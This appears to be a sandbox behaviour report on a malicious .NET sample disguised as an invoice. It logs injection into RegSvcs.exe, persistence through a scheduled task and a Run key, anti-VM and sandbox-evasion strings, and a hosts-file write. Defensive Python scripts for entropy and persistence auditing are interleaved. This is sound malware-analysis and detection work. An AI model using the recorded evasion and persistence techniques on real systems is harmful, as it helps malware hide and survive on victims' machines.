            Source: ahgeNfsrA.exe.0.dr, AddCompanyForm.cs | .Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
            Source: 0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack, AddCompanyForm.cs | .Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B5E81 push edi; retf
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B5E86 push edi; retf
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_08324FD5 push dword ptr [edx+ebp*2-75h]; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C617E9 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C61789 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C6177F push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C63330 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C618CB push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C618AF push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C618B3 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C60040 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C61867 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C61863 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C6187F push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C61817 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C6181B push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C61833 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C62177 push edi; retn 0000h
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D114F3 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D114FB push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D114FF push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D114EF push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D114B3 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D114B7 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D114BF push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D114A3 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D11457 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D11473 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D11467 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D1146B push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D1141B push es; retf
            Source: initial sample | Static PE information: section name: .text entropy: 7.770423052382821
            Source: initial sample | Static PE information: section name: .text entropy: 7.770423052382821
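            The two entropy rows above report 7.77 bits per byte for the sample's .text section, close to the 8.0 maximum and a typical sign that the section carries a compressed or encrypted payload rather than ordinary compiled code. The Python script below is an added example, not part of the report: it computes Shannon entropy per PE section by walking the section table directly (no pefile dependency), applies a 7.0 threshold to flag likely packing, and includes a minimal constructed PE image as a fixture so it runs offline. The threshold, the fixture and the two constructed payloads are this example's assumptions.

```python
import math
import struct
from collections import Counter

PACKED_THRESHOLD = 7.0  # rule of thumb: compressed or encrypted data approaches 8 bits/byte


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Yield (section_name, raw_bytes) by walking the PE section table by hand."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", image, coff + 2)
    (size_opt,) = struct.unpack_from("<H", image, coff + 16)
    table = coff + 20 + size_opt  # section headers follow the COFF and optional headers
    for i in range(num_sections):
        hdr = table + 40 * i
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        size_raw, ptr_raw = struct.unpack_from("<II", image, hdr + 16)  # SizeOfRawData, PointerToRawData
        yield name, image[ptr_raw:ptr_raw + size_raw]


def section_entropies(image: bytes) -> dict:
    """Entropy of every section's raw data, keyed by section name."""
    return {name: shannon_entropy(raw) for name, raw in pe_sections(image)}


def looks_packed(image: bytes) -> bool:
    """True if any section exceeds the threshold (the report's .text scored 7.77)."""
    return any(e > PACKED_THRESHOLD for e in section_entropies(image).values())


def build_test_pe(text_payload: bytes) -> bytes:
    """Constructed fixture: a minimal 32-bit PE with a single .text section holding text_payload."""
    e_lfanew, size_opt, ptr_raw = 0x80, 0xE0, 0x200
    img = bytearray(0x40)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img += b"\0" * (e_lfanew - len(img))
    img += b"PE\0\0"
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    img += struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_opt, 0x0102)
    img += b"\0" * size_opt  # optional header contents are irrelevant to the section walk
    # Section header: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
    # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
    img += struct.pack("<8sIIIIIIHHI", b".text", len(text_payload), 0x1000, len(text_payload),
                       ptr_raw, 0, 0, 0, 0, 0x60000020)
    img += b"\0" * (ptr_raw - len(img))
    return bytes(img) + text_payload


# Constructed payloads: readable text versus a byte-uniform blob standing in for an encrypted stage.
PLAIN_TEXT = b"The quick brown fox jumps over the lazy dog. " * 40
UNIFORM_BYTES = bytes(range(256)) * 8

if __name__ == "__main__":
    for label, payload in (("plain text", PLAIN_TEXT), ("uniform bytes", UNIFORM_BYTES)):
        img = build_test_pe(payload)
        print(label, {k: round(v, 3) for k, v in section_entropies(img).items()}, "packed:", looks_packed(img))
```

            Point `section_entropies` at a real file's bytes to reproduce the report's figure; ordinary native code sits around 6.0 to 6.8, so a .text section above 7 is worth unpacking, although legitimately compressed resources or embedded certificates can push a single section over the line too.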
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File created: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe

            Boot Survival

            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kECjS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kECjS
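            The Boot Survival rows above show two persistence mechanisms: a scheduled task (Updates\ahgeNfsrA) registered from an XML definition written to %TEMP%, and an HKCU Run value (kECjS) written by the injected RegSvcs.exe. The Python script below is an added example, not part of the report. It audits a Task Scheduler XML definition and a set of Run-key values for actions that point into user-writable locations, and reports hidden tasks and logon/boot triggers. The task XML and the Run-key data are constructed for this example: the report names the task and the value but includes neither the XML nor the value data, so the executable paths are assumed from the files the report lists as dropped, and the SecurityHealth entry is a constructed benign value for contrast.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"

# Locations a standard user can write to; a persistence entry pointing here deserves a look.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Desktop|Downloads)\\|%(APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE)%", re.I)

# Constructed task definition (assumption: what tmp69D2.tmp might contain; the report does not include it).
# Real `schtasks /Query /XML` output is UTF-16 with an XML declaration: decode it before calling audit_task_xml.
TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Settings>
    <Hidden>true</Hidden>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\ahgeNfsrA.exe</Command>
    </Exec>
  </Actions>
</Task>"""

# Constructed HKCU\Software\Microsoft\Windows\CurrentVersion\Run contents. The kECjS path is assumed from the
# dropped file the report lists; SecurityHealth is a constructed benign entry.
RUN_VALUES = {
    "kECjS": r'"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"',
    "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
}


def _tag(local: str) -> str:
    """Namespace-qualified tag name for the Task Scheduler schema."""
    return f"{{{TASK_NS}}}{local}"


def audit_task_xml(xml_text: str) -> list:
    """Findings for one Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)
    findings = []
    for action in root.iter(_tag("Exec")):
        command = (action.findtext(_tag("Command")) or "").strip()
        arguments = (action.findtext(_tag("Arguments")) or "").strip()
        if USER_WRITABLE.search(command) or USER_WRITABLE.search(arguments):
            findings.append(f"Exec action in user-writable location: {command} {arguments}".rstrip())
    if (root.findtext(f".//{_tag('Hidden')}") or "").strip().lower() == "true":
        findings.append("task is marked Hidden")
    for trigger in ("LogonTrigger", "BootTrigger"):
        if root.find(f".//{_tag(trigger)}") is not None:
            findings.append(f"persistence trigger: {trigger}")
    return findings


def audit_run_values(values: dict) -> list:
    """Run-key values whose command points into a user-writable location."""
    return [f"Run\\{name} -> {cmd}" for name, cmd in values.items() if USER_WRITABLE.search(cmd)]


if __name__ == "__main__":
    for finding in audit_task_xml(TASK_XML) + audit_run_values(RUN_VALUES):
        print("FINDING:", finding)
```

            On a live host, feed it the output of `schtasks /Query /TN "Updates\ahgeNfsrA" /XML` and the Run key read from the registry. The user-writable heuristic alone also catches legitimate per-user software (OneDrive lives under AppData\Local, for example), so in production pair it with an Authenticode signature check or an allowlist rather than treating every hit as malicious.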

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process information set: NOOPENFILEERRORBOX (35 occurrences)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara match | File source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.339297827.0000000003349000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.339297827.0000000003349000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe TID: 5484 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe TID: 3636 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe TID: 4216 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (3 occurrences)
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Thread delayed: delay time: 922337203685477 (4 occurrences)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 9568
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process information queried: ProcessInformation
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: RegSvcs.exe, 0000000E.00000002.551236469.00000000067C2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C6B6A0 LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 436000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 107C008
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File written: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
